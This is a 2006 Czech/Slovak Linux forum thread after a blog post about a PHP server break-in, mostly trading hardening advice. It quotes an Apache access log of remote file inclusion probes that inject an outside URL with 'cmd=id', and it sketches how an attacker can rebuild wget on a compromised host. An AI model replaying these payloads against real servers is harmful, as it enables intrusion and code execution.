Pár dní po hackerskom útoku (diskuse)

AbcLinuxu:/ Blogy / adam / Pár dní po hackerskom útoku / Pár dní po hackerskom útoku (diskuse)

Štítky: Apache, distribuce, e-mail, firewally, Gentoo, HTML, Internet, iptables, PHP, programování, sítě, SMTP, SSH, stahování, web, wget

Nástroje: Začni sledovat (3) ?

Vložit další komentář

11.7.2006 02:58 Creckx | skóre: 23 | blog: cxblog | Lanškroun
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

Už je to dlouho co jsem si hrál s nastavováním PHP. Nemá náhodou něco jako SafeMode, kterej znepřístupní nebezpečné fce? Jinak bych to neřešil :) DoS útoky jsou větší hnus, tohle je ještě sranda :)

Můj blog Pokud máte taky blog, můžeme vyměnit odkazy :)

12.7.2006 14:50 xadam | skóre: 1 | blog: adam
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Ano to je pravda, mal som moznost vidiet jadan priebeh organizovaneho DOS utoku. Bol tam paradny trafik, niekolko sto megabit :)

12.7.2006 17:16 Creckx | skóre: 23 | blog: cxblog | Lanškroun
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Šéf jen co zapojil server do sítě tak stovky IP adres se začalo dotazovat. Pěkně přes POST tlačily data :)

Můj blog Pokud máte taky blog, můžeme vyměnit odkazy :)

11.7.2006 06:59 Ladislav Sückr | skóre: 21
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

Ten wget a kompilátor máte na produkčním serveru?

Myslet špatně je lepší než nemyslet vůbec.

11.7.2006 08:08 Filip Jirsák | skóre: 67 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Třeba s Gentoo je docela problém nemít wget a kompilátor. I když taky to jde, samozřejmě…

Spíš je IMHO důležité útočníka na server vůbec nepustit. Když už může vykonávat shell skripty kdekoliv z internetu, není pro něj problém vykonávat po částech shell script

echo "blabla" > wget
echo "bleble" >> wget
chmod u+x wget

A takhle si na server poslat svou kopii staticky slinkovaného wgetu. A tím si pak stáhnout kompilátor.

11.7.2006 11:23 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Gentoo bez kompilátoru je jako ryba bez vody, herní stanice bez monitoru, já bez počítače, nebo prdel bez hrnce - nemožný :-)

“Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon

11.7.2006 11:39 Heron | skóre: 53 | blog: root_at_heron | Olomouc
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Ale tady jde o komerční server, ne o hračku pro děti ;-)

Heron

11.7.2006 11:54 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Ňákej vostrej ... ;-)

“Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon

11.7.2006 12:26 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Fakt? To nejde ani přeložit balíčky jinde a na serveru instalovat binární verze?

When your hammer is C++, everything begins to look like a thumb.

11.7.2006 12:31 David Watzke | skóre: 74 | blog: Blog... | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Jasně že jde, ale víš jak to myslím. Je to proti přírodě :-D

Taky můžeš mít herní stanici bez monitoru.

“Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon

11.7.2006 12:31 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Samozdrejme, ze to de, jenom to nedela.

12.7.2006 01:01 Ondřej Čečák | skóre: 33
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

To mi jako problem nepripada, vzhledem k tomu, ze si ten wget muzu treba pomoci diry v PHP na system protlacit a pak si cokoli dalsiho treba zkompilovat a stahnout -- rychle a celkem elegantne.

-- "Ja vim, on vi, ty pico!"

11.7.2006 08:02 Filip Jirsák | skóre: 67 | blog: Fa & Bi
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

Především by web server neměl běžet s právy roota, ale pod nějakým uživatelem, kterému vhodně omezím přístup.

11.7.2006 10:05 Aldagautr | skóre: 20
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

muzes zacit tady

o svobodu prichazi nejsnaze ten, kdo o ni nikdy nebojoval

11.7.2006 11:10 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

Protoze potrebuji tahat nektere stranky online z jineho serveru tak jsem server zabezpecil tak, ze jsem v iptables zakazal odchozi spojeni na vsechny krome vybranych serveru (DNS, SMTP a par dalsich). Bohuzel si myslim, ze kdyz clovek provozuje PHP aplikace tretich stran, tak si nikdy nemuze byt jisty, ze na serveru nema diru :-(

. Takze mozna neco jako bezici snort, semtam skusit nessus (stalo se mi, ze mi rekl o dire ktera byla v jedne aplikaci co provozuji), pravidelne zalohovat a modlit se :-(

. Doufam, ze me nikdo za to co delam neukamenuje (nemyslim si, ze jsem dobry administrator, sem spise programator a tak ten server i vypada, ale snazim se).

11.7.2006 23:56 Jakub Suchy | skóre: 22 | Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Staci v php.ini dat allow_url_fopen Off a open_basedir na domovsky adresar uzivatele a /tmp. bohuzel je to nutne udelat per virtualhost...

Drupal

11.7.2006 11:28 kaaja | skóre: 24 | blog: Sem tam něco | Podbořany, Praha
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

Jeste pro pobaveni jak jsem si zabezpecit server (pouzivaji ho jen ostatni servery pro autentizaci uzivatelu) . Tak jsem ho zabezpecoval pres iptables, az se mi podarilo zabit ssh port. To by nebylo tak hrozne, kdyby jsem k tomu serveru mel pripojenou klavesnici a monitor. Zatim sem se jeste nedokopal k tomu, abych to obnovil :-)

12.7.2006 22:24 xadam | skóre: 1 | blog: adam
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

asi ti pristup k tomu serveru nechyba ze? ...:) Mame spravene tiez iptablesy, je to vcelku dobra vec. Ale pri velkom pocte pocitacov clovek obcas na nieco zabudne, lebo robi moc rychlo ked je vela inej prace ;)

11.7.2006 23:32 diverman | skóre: 32 | blog: život s tučňáčkem
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

To se mi taky stalo, zalozil jsem u sebe docasny ucet se stejnym jmenem a heslem, ktery jsem potom zapomel vymazat. A on si tam wgetem stahl nejaky scannery, brutal-forcy atd... Vic se nestalo. A zapomel po sobe vymazat .bash_history :-)

deb http://ftp.cz.debian.org/debian jessie main contrib non-free

12.7.2006 02:46 k3 | skóre: 15 | blog:
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

krom toho, ze to vypada na slusnou lamu tak to nedela jen pro zabavu... mezi tema jeho vecma se da najit par divnejch veci.. napr ebay.zip moc jsem toho teda nestahl.. kdyz jsem si to chtel zmirrorovat tak na te sajte dosel traffic limit :(

10.11.2006 15:07 xadam | skóre: 1 | blog: adam
Rozbalit Rozbalit vše Re: Pár dní po hackerskom útoku

Odpovědět | Sbalit | Link | Blokovat | Admin

stle sa vedu utoky podobneho charakteru. prikladam vypis z konzoly (access_log) apache

more /var/log/apache/access_log | grep http:// | grep 10/Nov/2006
82.7.25.196 - - [10/Nov/2006:00:18:21 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
70.42.51.20 - - [10/Nov/2006:01:58:54 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
193.179.220.253 - - [10/Nov/2006:06:34:23 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
84.47.91.200 - - [10/Nov/2006:08:34:44 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
193.87.64.155 - - [10/Nov/2006:09:15:21 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.0" 200 72
195.91.54.84 - - [10/Nov/2006:12:56:18 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.1" 200 84
195.49.188.227 - - [10/Nov/2006:12:59:30 +0100] "GET /redirection.php?dest_url=http://www.eacademy.tnuni.sk&poradie_d=102&zcs=1 HTTP/1.0" 200 72
151.56.239.254 - - [10/Nov/2006:14:21:32 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
151.56.239.254 - - [10/Nov/2006:14:21:34 +0100] "GET /index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
151.56.239.254 - - [10/Nov/2006:14:21:35 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:58:30 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:58:58 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:14:59:00 +0100] "GET /index.php/?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:15:03:45 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html HTTP/1.1" 200 62608
193.87.65.21 - - [10/Nov/2006:15:04:32 +0100] "GET //index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
193.87.65.21 - - [10/Nov/2006:15:04:44 +0100] "GET //index.php?start=1&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=1 HTTP/1.1" 200 46373
193.87.65.21 - - [10/Nov/2006:15:05:24 +0100] "GET /index.php?start=http://busca.uol.com.br/uol/index.html?&cmd=id&poradie_d=http://busca.uol.com.br/uol/index.html?&cmd=id7http://busca.uol.com.br/uol/index.html?&cmd=id&zcs=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 62608

Založit nové vlákno • Nahoru

Tiskni Sdílej: